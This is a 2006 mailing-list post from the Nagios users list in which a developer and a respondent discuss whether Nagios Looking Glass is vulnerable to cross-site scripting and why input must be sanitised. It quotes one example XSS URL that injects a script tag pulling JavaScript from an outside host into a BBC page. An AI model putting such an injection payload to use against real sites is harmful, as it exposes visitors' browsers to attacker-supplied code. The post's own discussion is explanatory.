ANNOUNCE: Nagios Looking Glass 1.0.0#PRE is here!

Andy Shellam (Mailing Lists) andy.shellam-lists at mailnetwork.co.uk
Thu Dec 28 20:24:03 CET 2006


Okay I've just been reading up on XSS attacks, and from what I can 
gather it's similar in essence to SQL injection attacks.

This link is an example:

http://www.bbc.co.uk/bbcone/listings/index.shtml?service_id=4223&DAY=today%22%3E%3Cscript%20src=http://www.securitylab.ru/test/sc.js%3E%3C/script%3E%3C!--

 From what I gather, most XSS are script-injections or injections where 
external data (ie. a GET variable) is changed - in the above case a 
<script ...></script> tag has been inserted.
In which case NLG is not vulnerable to these types of attacks as it does 
not send, verbatim, any GET variables - the 4 variables it uses - "fid, 
gid, sid, and view" - are only used to request further information (eg. 
'view' tells NLG which view to render - server status, network status, 
or server summary - 'sid' is a server sequence - so 0 gets the first 
alphabetical server, 1 gets the second server etc. and the same for the 
group/filter.)  It never returns the variable value to print verbatim in 
the page.

Also with the confirmation that the poller does check the variables 
before using them, I think NLG isn't going to suffer.

If any fancies cracking it, and showing me how it can be done, I'll do 
everything in my power to fix it, but with the addition of the 
client-side checking of the variables before passing them off to the 
poller, I'll maintain it's not at risk.

Thanks,

Andy.

Robert Hajime Lanning wrote:
> <quote who="Andy Shellam (Mailing Lists)">
>   
>>  From the client-side, the URL that's built in the JavaScript comes
>> out to:
>>
>> "?view=server&fid=1&gid=3"
>>
>> That's the most info you'll get out of the JS - pass that to the
>> s3_client.php page and you'll get an un-styled, plain format of the
>> page that's rendered when you click on a "Server" link.
>> What benefit is there (to a normal user or a hacker) of wanting to
>> change the fid and gid?  They do nothing except choose which data you
>> want to get back to the client front-end.
>>     
>
> It might not be a security issue to NLG, but passing any variable
> back to the client, unsanitized, is an opening for cross site
> scripting (XSS).  This is where an attacker feeds the URL for
> your site (including the bad data) to an unknowing client, that
> then receives the bad data as part of the returned web page from
> your site.
>
> It is usually an attack directly to the web browser, or to another
> site, relayed by your site.
>
> So, ALL variables that contain data from outside the server
> environment must be sanitized before use.  This is why perl has
> their "taint" mode.  Where all variables that contain external
> data are "tainted" until sanitized through substitutions and the
> likes.  And it gives errors if a "tainted" variable is used
> before being sanitized.
>
> In PHP, you have to be aware, as it does not have a "taint" like
> mode.
>
>   


-- 
Andy Shellam
NetServe Support Team

the Mail Network
"an alternative in a standardised world"

p: +44 (0) 121 288 0832/0839
m: +44 (0) 7818 000834


-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys - and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
Nagios-users mailing list
Nagios-users at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/nagios-users
::: Please include Nagios version, plugin version (-v) and OS when reporting any issue. 
::: Messages without supporting info will risk being sent to /dev/null





More information about the Users mailing list